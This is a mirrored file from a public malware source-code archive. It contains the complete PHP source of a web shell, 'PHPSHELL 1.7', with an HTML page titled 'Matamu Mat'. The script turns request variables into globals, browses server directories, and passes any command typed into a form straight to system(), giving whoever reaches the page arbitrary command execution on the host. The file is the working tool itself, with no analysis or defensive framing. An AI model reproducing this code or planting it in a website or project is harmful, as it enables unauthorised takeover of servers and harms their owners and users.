mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
147 lines
3.9 KiB
Plaintext
147 lines
3.9 KiB
Plaintext
|
<?php
|
||
|
|
||
|
define('PHPSHELL_VERSION', '1.7');
|
||
|
|
||
|
?>
|
||
|
|
||
|
<html>
|
||
|
<head>
|
||
|
<title> Matamu Mat </title>
|
||
|
</head>
|
||
|
<body>
|
||
|
<hr><br>
|
||
|
|
||
|
<?php
|
||
|
|
||
|
if (ini_get('register_globals') != '1') {
|
||
|
/* We'll register the variables as globals: */
|
||
|
if (!empty($HTTP_POST_VARS))
|
||
|
extract($HTTP_POST_VARS);
|
||
|
|
||
|
if (!empty($HTTP_GET_VARS))
|
||
|
extract($HTTP_GET_VARS);
|
||
|
|
||
|
if (!empty($HTTP_SERVER_VARS))
|
||
|
extract($HTTP_SERVER_VARS);
|
||
|
}
|
||
|
|
||
|
/* First we check if there has been asked for a working directory. */
|
||
|
if (!empty($work_dir)) {
|
||
|
/* A workdir has been asked for */
|
||
|
if (!empty($command)) {
|
||
|
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
||
|
/* We try and match a cd command. */
|
||
|
if ($regs[1][0] == '/') {
|
||
|
$new_dir = $regs[1]; // 'cd /something/...'
|
||
|
} else {
|
||
|
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
|
||
|
}
|
||
|
if (file_exists($new_dir) && is_dir($new_dir)) {
|
||
|
$work_dir = $new_dir;
|
||
|
}
|
||
|
unset($command);
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
if (file_exists($work_dir) && is_dir($work_dir)) {
|
||
|
/* We change directory to that dir: */
|
||
|
chdir($work_dir);
|
||
|
}
|
||
|
|
||
|
/* We now update $work_dir to avoid things like '/foo/../bar': */
|
||
|
$work_dir = exec('pwd');
|
||
|
|
||
|
?>
|
||
|
|
||
|
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
|
||
|
<p>Current working directory: <b>
|
||
|
<?php
|
||
|
|
||
|
$work_dir_splitted = explode('/', substr($work_dir, 1));
|
||
|
|
||
|
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
|
||
|
|
||
|
if (!empty($work_dir_splitted[0])) {
|
||
|
$path = '';
|
||
|
for ($i = 0; $i < count($work_dir_splitted); $i++) {
|
||
|
$path .= '/' . $work_dir_splitted[$i];
|
||
|
printf('<a href="%s?work_dir=%s">%s</a>/',
|
||
|
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
?></b></p>
|
||
|
<p>Choose new working directory:
|
||
|
<select name="work_dir" onChange="this.form.submit()">
|
||
|
<?php
|
||
|
/* Now we make a list of the directories. */
|
||
|
$dir_handle = opendir($work_dir);
|
||
|
/* Run through all the files and directories to find the dirs. */
|
||
|
while ($dir = readdir($dir_handle)) {
|
||
|
if (is_dir($dir)) {
|
||
|
if ($dir == '.') {
|
||
|
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
||
|
} elseif ($dir == '..') {
|
||
|
/* We have found the parent dir. We must be carefull if the parent
|
||
|
directory is the root directory (/). */
|
||
|
if (strlen($work_dir) == 1) {
|
||
|
/* work_dir is only 1 charecter - it can only be / There's no
|
||
|
parent directory then. */
|
||
|
} elseif (strrpos($work_dir, '/') == 0) {
|
||
|
/* The last / in work_dir were the first charecter.
|
||
|
This means that we have a top-level directory
|
||
|
eg. /bin or /home etc... */
|
||
|
echo "<option value=\"/\">Parent Directory</option>\n";
|
||
|
} else {
|
||
|
/* We do a little bit of string-manipulation to find the parent
|
||
|
directory... Trust me - it works :-) */
|
||
|
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
|
||
|
}
|
||
|
} else {
|
||
|
if ($work_dir == '/') {
|
||
|
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
|
||
|
} else {
|
||
|
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
closedir($dir_handle);
|
||
|
|
||
|
?>
|
||
|
|
||
|
</select></p>
|
||
|
|
||
|
<p>Command: <input type="text" name="command" size="60">
|
||
|
<input name="submit_btn" type="submit" value="Execute Command"></p>
|
||
|
|
||
|
<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
|
||
|
<textarea cols="80" rows="20" readonly>
|
||
|
|
||
|
<?php
|
||
|
if (!empty($command)) {
|
||
|
if ($stderr) {
|
||
|
$tmpfile = tempnam('/tmp', 'phpshell');
|
||
|
$command .= " 1> $tmpfile 2>&1; " .
|
||
|
"cat $tmpfile; rm $tmpfile";
|
||
|
} else if ($command == 'ls') {
|
||
|
/* ls looks much better with ' -F', IMHO. */
|
||
|
$command .= ' -F';
|
||
|
}
|
||
|
system($command);
|
||
|
}
|
||
|
?>
|
||
|
|
||
|
</textarea>
|
||
|
</form>
|
||
|
|
||
|
<script language="JavaScript" type="text/javascript">
|
||
|
document.forms[0].command.focus();
|
||
|
</script>
|
||
|
|
||
|
<hr>
|
||
|
|
||
|
</body>
|
||
|
</html>
|